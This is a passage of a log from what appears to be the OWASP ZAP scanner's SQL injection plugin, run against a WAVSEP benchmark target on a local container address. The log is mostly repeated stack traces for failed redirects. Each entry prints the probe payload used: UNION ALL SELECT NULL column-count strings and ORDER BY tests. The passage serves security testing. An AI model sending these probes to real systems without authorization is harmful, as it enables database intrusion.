[172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679998 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680000 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680001 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680002 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680003 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680004 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680005 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680007 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680009 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680010 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 3248#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 3248# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680011 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680012 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at 